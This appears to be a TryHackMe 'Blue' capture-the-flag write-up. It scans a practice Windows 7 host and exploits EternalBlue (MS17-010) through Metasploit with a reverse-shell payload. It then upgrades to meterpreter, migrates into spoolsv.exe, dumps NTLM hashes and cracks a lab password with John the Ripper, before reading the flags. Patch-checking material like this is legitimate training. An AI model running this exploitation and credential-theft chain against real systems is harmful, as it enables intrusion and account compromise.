Blue writeup [thm]
Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
Blue is the third challenge in the Getting Started section on the Offensive Pentesting path.
Warning: this writeup contains full solutions.
Recon
Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
$: nmap -sV -sC --script vuln -oN blue.nmap $target
We get a lot of interesting information:
# Nmap 7.91 scan initiated Mon May 17 17:57:40 2021 as: nmap -sV -sC --script vuln -oN blue.nmap $target
Nmap scan report for $target
Host is up (0.047s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 17 17:59:24 2021 -- 1 IP address (1 host up) scanned in 103.42 seconds
How many ports are open with a port number under 1000?
Only 3.
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
smb-vuln-ms17-010:
  VULNERABLE:
  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    State: VULNERABLE
    IDs:  CVE:CVE-2017-0143
    Risk factor: HIGH
      A critical remote code execution vulnerability exists in Microsoft SMBv1
       servers (ms17-010).
ms17-010. EternalBlue (patched by Microsoft via MS17-010) is a security flaw related to how a Windows SMB 1.0 (SMBv1) server handles certain requests. If successfully exploited, it can allow attackers to execute arbitrary code in the target system. EternalBlue was developed by the NSA.
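The two recon questions above (open ports under 1000, and which bulletin the host is missing) are exactly what a defender pulls out of a vuln-script scan when verifying patch state across a fleet. The following is an added example, not part of the original writeup: a small parser for `nmap -oN` output that lists open ports, extracts every `State: VULNERABLE` entry from the NSE output together with its CVE, and maps those findings back to Microsoft bulletin ids. The sample scan embedded in it is a constructed, abridged copy of the output shown above with a placeholder address standing in for the target.

```python
import re

# Constructed sample: abridged copy of the writeup's `nmap -sV -sC --script vuln`
# output, with the target replaced by a placeholder address.
SAMPLE_NMAP = """\
# Nmap 7.91 scan initiated Mon May 17 17:57:40 2021 as: nmap -sV -sC --script vuln -oN blue.nmap 10.0.0.1
Nmap scan report for 10.0.0.1
Host is up (0.047s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|       Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|_    Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|_      servers (ms17-010).
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
# NSE script names are lowercase and hyphenated ("smb-vuln-ms17-010:"); this
# deliberately does not match "State:", "IDs:" or "https:" lines.
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9]*(?:-[a-z0-9]+)+):(.*)$")
KEYVAL_RE = re.compile(r"^\w[\w ]*:")          # "Risk factor: ...", "References:", URLs
CVE_RE = re.compile(r"IDs:\s*CVE:(CVE-\d{4}-\d+)")
MS_RE = re.compile(r"\bms\d{2}-\d{3}\b", re.IGNORECASE)


def open_ports(text):
    """Return [(port, proto, service)] for every port line Nmap reports as open."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4)))
    return ports


def count_open_below(text, limit=1000):
    return sum(1 for port, _, _ in open_ports(text) if port < limit)


def vulnerable_findings(text):
    """Extract every 'State: VULNERABLE' entry from NSE vuln-script output.

    The title of a finding is the last free-text line (no 'Key: value' shape)
    seen before its 'State: VULNERABLE' line; the CVE is taken from the
    following 'IDs:' line when present.
    """
    findings = []
    script = None
    title = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                         # only NSE output lines
        line = raw.lstrip("|_ ").rstrip()
        m = SCRIPT_RE.match(line)
        if m:
            script, title = m.group(1), None   # new script block starts
            continue
        if not line:
            continue
        cve = CVE_RE.search(line)
        if line == "State: VULNERABLE":
            findings.append({"script": script, "title": title, "cve": None})
        elif cve and findings:
            findings[-1]["cve"] = cve.group(1)
        elif not KEYVAL_RE.match(line):
            title = line
    return findings


def bulletins(text):
    """Set of Microsoft bulletin ids (msNN-NNN) named by the VULNERABLE findings."""
    ids = set()
    for f in vulnerable_findings(text):
        for field in (f["script"] or "", f["title"] or ""):
            ids.update(m.lower() for m in MS_RE.findall(field))
    return ids


if __name__ == "__main__":
    print("open ports < 1000:", count_open_below(SAMPLE_NMAP))
    for f in vulnerable_findings(SAMPLE_NMAP):
        print(f["script"], f["cve"], "-", f["title"])
    print("missing bulletins:", sorted(bulletins(SAMPLE_NMAP)))
```

Point it at a directory of `-oN` files and the `bulletins()` set per host becomes a patch-verification report; `smb-vuln-ms17-010` in particular is the check to re-run after applying MS17-010 or disabling SMBv1.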
Gain Access
Start Metasploit
$: msfconsole
[!] The following modules could not be loaded!
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /home/$usr/.msf4/logs/framework.log for details.

       =[ metasploit v6.0.36-dev                          ]
+ -- --=[ 2106 exploits - 1131 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Use the edit command to open the currently active module in your editor

msf6 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Given above: exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.x.x      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS $target
RHOSTS => $target
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: set payload windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
Set LHOST to the THM VPN tunnel IP:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST $tunip
LHOST => $tunip
With that done, run the exploit!
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Started reverse TCP handler on $tunip:4444
$target:445 - Executing automatic check (disable AutoCheck to override)
$target:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
$target:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
$target:445 - Scanned 1 of 1 hosts (100% complete)
$target:445 - The target is vulnerable.
$target:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
$target:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
$target:445 - Scanned 1 of 1 hosts (100% complete)
$target:445 - Connecting to target for exploitation.
$target:445 - Connection established for exploitation.
$target:445 - Target OS selected valid for OS indicated by SMB reply
$target:445 - CORE raw buffer dump (42 bytes)
$target:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
$target:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
$target:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
$target:445 - Target arch selected valid for arch indicated by DCE/RPC reply
$target:445 - Trying exploit with 12 Groom Allocations.
$target:445 - Sending all but last fragment of exploit packet
$target:445 - Starting non-paged pool grooming
$target:445 - Sending SMBv2 buffers
$target:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
$target:445 - Sending final SMBv2 buffers.
$target:445 - Sending last fragment of exploit packet!
$target:445 - Receiving response from exploit packet
$target:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
$target:445 - Sending egg to corrupted connection.
$target:445 - Triggering free of corrupted buffer.
Sending stage (336 bytes) to $target
Command shell session 1 opened ($tunip:4444 -> $target:49193) at 2021-05-17 18:07:59 +0200
$target:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$target:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$target:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Escalate
Escalate privileges, learn how to upgrade shells in metasploit.
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
post/multi/manage/shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
Find and set the session id:
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               $tunip:4444 -> $target:49193 ($target)

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on $tunip:4433
[*] Post module execution completed
[*] Sending stage (175174 bytes) to $target
[*] Meterpreter session 2 opened ($tunip:4433 -> $target:49203) at 2021-05-17 18:15:37 +0200
[*] Stopping exploit/multi/handler
Switch to the meterpreter shell:
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         shell x64/windows                                      $tunip:4444 -> $target:49193 ($target)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC  $tunip:4433 -> $target:49203 ($target)

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Nice!
List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 432   660   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 460   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 560   552   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 612   552   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 620   600   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 660   600   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 696   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 708   612   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 716   612   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 724   612   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 832   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 900   708   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 916   560   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 924   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 948   708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1088  708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1184  708   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 1308  708   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1344  708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1404  708   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1480  708   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1616  708   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1696  396   powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 1728  1696  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 1776  708   powercfg.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\powercfg.exe
 1800  560   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1944  708   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 1976  1308  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2012  708   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM
 2100  832   WmiPrvSE.exe
 2312  560   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2420  708   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE
 2436  708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 2648  708   vds.exe               x64   0        NT AUTHORITY\SYSTEM
 2736  708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 2784  708   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM
The print spooler service, spoolsv.exe, is a good choice. It is the printer process and it always runs as NT AUTHORITY\SYSTEM. It also respawns if killed and its architecture (x64) matches the target.
 1308  708   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
We migrate to PID 1308:
meterpreter > migrate 1308
[*] Migrating from 1728 to 1308...
[*] Migration completed successfully.
Cracking
Dump the non-default user's password and crack it!
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Copy this password hash to a file and research how to crack it. What is the cracked password?
$: john --format=NT jon.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)
1g 0:00:00:00 DONE (2021-05-17 21:19) 1.111g/s 11333Kp/s 11333Kc/s 11333KC/s alqui..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

$: john --format=NT jon.hash --show
Jon:alqfna22:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

1 password hash cracked, 0 left
Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they're meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Flag1? This flag can be found at the system root.
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../../
meterpreter > ls
Listing: C:\
============

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2009-07-14 05:18:56 +0200  $Recycle.Bin
40777/rwxrwxrwx   0        dir   2009-07-14 07:08:56 +0200  Documents and Settings
40777/rwxrwxrwx   0        dir   2009-07-14 05:20:08 +0200  PerfLogs
40555/r-xr-xr-x   4096     dir   2009-07-14 05:20:08 +0200  Program Files
40555/r-xr-xr-x   4096     dir   2009-07-14 05:20:08 +0200  Program Files (x86)
40777/rwxrwxrwx   4096     dir   2009-07-14 05:20:08 +0200  ProgramData
40777/rwxrwxrwx   0        dir   2018-12-13 04:13:22 +0100  Recovery
40777/rwxrwxrwx   4096     dir   2018-12-13 00:01:17 +0100  System Volume Information
40555/r-xr-xr-x   4096     dir   2009-07-14 05:20:08 +0200  Users
40777/rwxrwxrwx   16384    dir   2009-07-14 05:20:08 +0200  Windows
100666/rw-rw-rw-  24       fil   2018-12-13 04:47:39 +0100  flag1.txt
0000/---------    2727648  fif   1971-10-21 15:45:36 +0100  hiberfil.sys
0000/---------    2727648  fif   1971-10-21 15:45:36 +0100  pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
meterpreter > pwd
C:\windows\system32\config
meterpreter > cat flag2.txt
flag{sam_database_elevated_access}
Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
meterpreter > pwd
C:\users\jon\Documents
meterpreter > cat flag3.txt
flag{admin_documents_can_be_valuable}
meterpreter >
Conclusion
Similarly to Burp Suite, using Metasploit feels like "cheating". On the other hand, Metasploit seems like a very powerful framework. I've only scratched the surface and I'm looking forward to using it more in the future.
I've been using Linux exclusively for so many years now that I've forgotten most things about Windows. I assumed that I would remember where the SAM file lives, but nope, I had to google that. Maybe I should brush up on my Windows skills.
It was a strange feeling to use an NSA exploit.
This was perhaps more of a walkthrough than a challenge but fun nevertheless.
Tools used:
- Nmap
- Metasploit
- John the Ripper